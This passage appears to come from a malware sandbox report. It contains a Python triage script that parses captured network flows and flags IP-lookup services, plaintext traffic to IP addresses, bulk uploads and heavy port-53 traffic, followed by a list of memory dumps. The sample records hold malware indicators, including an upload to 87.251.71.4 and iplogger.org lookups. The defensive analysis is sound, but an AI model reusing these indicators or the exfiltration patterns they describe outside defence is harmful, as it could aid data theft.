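# Constructed sample: three records copied from the table above; the blank lines the
# page puts around labels are ignored, and the last record has no protocol line, as on the page.
SAMPLE = """
• 87.251.71.4:80
  http://87.251.71.4//
  http
  AddInProcess32.exe
  3.7MB
  47.7kB
  2488
  1183
  HTTP Request
  POST http://87.251.71.4//
  HTTP Response
  200
• 8.8.8.8:53
  iplogger.org
  dns
  gaoou.exe
  58 B
  74 B
  1
  1
  DNS Request
  iplogger.org
  DNS Response
  88.99.66.31
• 198.13.62.186:53
  email.yg9.me
  SystemNetworkService
  59.4kB
  628.9kB
  1124
  1125
"""
_UNITS = {"B": 1, "kB": 10**3, "MB": 10**6, "GB": 10**9}
_PROTO_LINE = re.compile(r"[a-z0-9]+(,\s*[a-z0-9]+)*")  # "tls, http", "dns"; never a process name
Flow = namedtuple("Flow", "dst target protocols process sent received pkts_sent pkts_received requests responses")

def parse_size(text: str) -> int:
    """'3.7MB' -> 3700000, '58 B' -> 58."""
    m = re.fullmatch(r"([\d.]+)\s*(B|kB|MB|GB)", text.strip())
    if not m:
        raise ValueError(f"unrecognised size: {text!r}")
    return int(round(float(m.group(1)) * _UNITS[m.group(2)]))

def host_of(flow: Flow) -> str:
    return urlparse(flow.target).hostname or flow.target  # DNS records carry a bare name

def parse_flows(text: str) -> list:
    flows = []
    for block in re.split(r"^\s*•\s*", text, flags=re.M):
        lines = [ln.strip() for ln in block.splitlines() if ln.strip()]
        if len(lines) < 7:
            continue
        dst, target, rest = lines[0], lines[1], lines[2:]
        protocols = ()
        if _PROTO_LINE.fullmatch(rest[0]):  # the protocol line is optional
            protocols, rest = tuple(p.strip() for p in rest[0].split(",")), rest[1:]
        proc, sent, recv, ps, pr = rest[:5]
        reqs, resps = [], []
        for label, value in zip(rest[5::2], rest[6::2]):  # "HTTP Request"/"DNS Response" + value
            (reqs if label.endswith("Request") else resps).append(value)
        flows.append(Flow(dst, target, protocols, proc, parse_size(sent), parse_size(recv),
                          int(ps), int(pr), reqs, resps))
    return flows

IP_LOOKUP_HOSTS = {"ip-api.com", "api.ip.sb", "iplogger.org"}  # all three appear in the table

def is_ip_literal(host: str) -> bool:
    try:
        return bool(ipaddress.ip_address(host))
    except ValueError:
        return False

def triage(flows, min_upload=1_000_000, upload_ratio=10.0, port53_bulk=10_000):
    """Heuristic findings as (kind, process, dst, detail) tuples; thresholds are arbitrary."""
    findings = []
    for f in flows:
        host = host_of(f)
        if host in IP_LOOKUP_HOSTS:
            findings.append(("ip-lookup", f.process, f.dst, host))
        if f.target.startswith("http://") and is_ip_literal(host):
            findings.append(("plaintext-to-ip-literal", f.process, f.dst, f.target))
        if f.sent >= min_upload and f.sent >= upload_ratio * max(f.received, 1):
            findings.append(("bulk-upload", f.process, f.dst, f"{f.sent} B out, {f.received} B in"))
        if f.dst.endswith(":53") and f.sent + f.received >= port53_bulk:  # far beyond name lookups
            findings.append(("port-53-bulk", f.process, f.dst, f"{f.sent + f.received} B on port 53"))
    return findings

if __name__ == "__main__":
    for finding in triage(parse_flows(SAMPLE)):
        print(*finding, sep="  ")
```

                        Run as a script it prints one finding per line (kind, process, destination, detail); to triage a full export, paste the bullet records into SAMPLE or read them from a file and pass the text to parse_flows. A process name written entirely in lowercase letters without a dot would be mistaken for a protocol line by _PROTO_LINE, which does not occur in this report but is worth knowing if the heuristic is reused.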
                        MITRE ATT&CK Enterprise v6


                        Downloads

                        • memory/752-146-0x0000028A44F30000-0x0000028A44FA0000-memory.dmp (Filesize: 448KB)
                        • memory/1008-240-0x00000196C6940000-0x00000196C69B0000-memory.dmp (Filesize: 448KB)
                        • memory/1008-145-0x00000196C6810000-0x00000196C6880000-memory.dmp (Filesize: 448KB)
                        • memory/1084-248-0x0000022C8DF90000-0x0000022C8E000000-memory.dmp (Filesize: 448KB)
                        • memory/1084-176-0x0000022C8DEB0000-0x0000022C8DF20000-memory.dmp (Filesize: 448KB)
                        • memory/1112-134-0x000001293F860000-0x000001293F8AB000-memory.dmp (Filesize: 300KB)
                        • memory/1112-231-0x0000012942000000-0x0000012942106000-memory.dmp (Filesize: 1.0MB)
                        • memory/1112-138-0x000001293F950000-0x000001293F9C0000-memory.dmp (Filesize: 448KB)
                        • memory/1140-174-0x0000026E3D4F0000-0x0000026E3D560000-memory.dmp (Filesize: 448KB)
                        • memory/1140-246-0x0000026E3DB40000-0x0000026E3DBB0000-memory.dmp (Filesize: 448KB)
                        • memory/1176-182-0x00000217A10D0000-0x00000217A1140000-memory.dmp (Filesize: 448KB)
                        • memory/1176-254-0x00000217A11B0000-0x00000217A1220000-memory.dmp (Filesize: 448KB)
                        • memory/1412-256-0x00000211C2690000-0x00000211C2700000-memory.dmp (Filesize: 448KB)
                        • memory/1412-184-0x00000211C2270000-0x00000211C22E0000-memory.dmp (Filesize: 448KB)
                        • memory/1420-250-0x000002BC1B300000-0x000002BC1B370000-memory.dmp (Filesize: 448KB)
                        • memory/1420-178-0x000002BC1B0A0000-0x000002BC1B110000-memory.dmp (Filesize: 448KB)
                        • memory/1948-252-0x00000288ECD40000-0x00000288ECDB0000-memory.dmp (Filesize: 448KB)
                        • memory/1948-180-0x00000288EC7D0000-0x00000288EC840000-memory.dmp (Filesize: 448KB)
                        • memory/2528-152-0x0000019512270000-0x00000195122E0000-memory.dmp (Filesize: 448KB)
                        • memory/2528-242-0x0000019512940000-0x00000195129B0000-memory.dmp (Filesize: 448KB)
                        • memory/2536-244-0x0000020466580000-0x00000204665F0000-memory.dmp (Filesize: 448KB)
                        • memory/2536-172-0x0000020465E90000-0x0000020465F00000-memory.dmp (Filesize: 448KB)
                        • memory/2696-151-0x000001617A770000-0x000001617A7E0000-memory.dmp (Filesize: 448KB)
                        • memory/2696-238-0x000001617AB90000-0x000001617AC00000-memory.dmp (Filesize: 448KB)
                        • memory/2780-258-0x000002B7E0C40000-0x000002B7E0CB0000-memory.dmp (Filesize: 448KB)
                        • memory/2780-186-0x000002B7E0240000-0x000002B7E02B0000-memory.dmp (Filesize: 448KB)
                        • memory/2800-188-0x0000024037E00000-0x0000024037E70000-memory.dmp (Filesize: 448KB)
                        • memory/2800-260-0x0000024038220000-0x0000024038290000-memory.dmp (Filesize: 448KB)
                        • memory/2812-202-0x0000000003650000-0x0000000003660000-memory.dmp (Filesize: 64KB)
                        • memory/2812-199-0x0000000000400000-0x00000000005DB000-memory.dmp (Filesize: 1.9MB)
                        • memory/2812-208-0x00000000037F0000-0x0000000003800000-memory.dmp (Filesize: 64KB)
                        • memory/2816-132-0x00000000046CE000-0x00000000047CF000-memory.dmp (Filesize: 1.0MB)
                        • memory/2816-141-0x00000000047D0000-0x000000000482C000-memory.dmp (Filesize: 368KB)
                        • memory/3992-137-0x00000000057E0000-0x00000000057E1000-memory.dmp (Filesize: 4KB)
                        • memory/3992-129-0x0000000000F40000-0x0000000000F41000-memory.dmp (Filesize: 4KB)
                        • memory/3992-143-0x0000000003220000-0x0000000003229000-memory.dmp (Filesize: 36KB)
                        • memory/4080-197-0x0000000003010000-0x0000000003011000-memory.dmp (Filesize: 4KB)
                        • memory/4080-198-0x0000000005170000-0x0000000005171000-memory.dmp (Filesize: 4KB)
                        • memory/4080-200-0x0000000005130000-0x0000000005736000-memory.dmp (Filesize: 6.0MB)
                        • memory/4080-196-0x0000000005740000-0x0000000005741000-memory.dmp (Filesize: 4KB)
                        • memory/4080-201-0x00000000051B0000-0x00000000051B1000-memory.dmp (Filesize: 4KB)
                        • memory/4080-189-0x0000000000400000-0x000000000041C000-memory.dmp (Filesize: 112KB)
                        • memory/4080-214-0x0000000005420000-0x0000000005421000-memory.dmp (Filesize: 4KB)
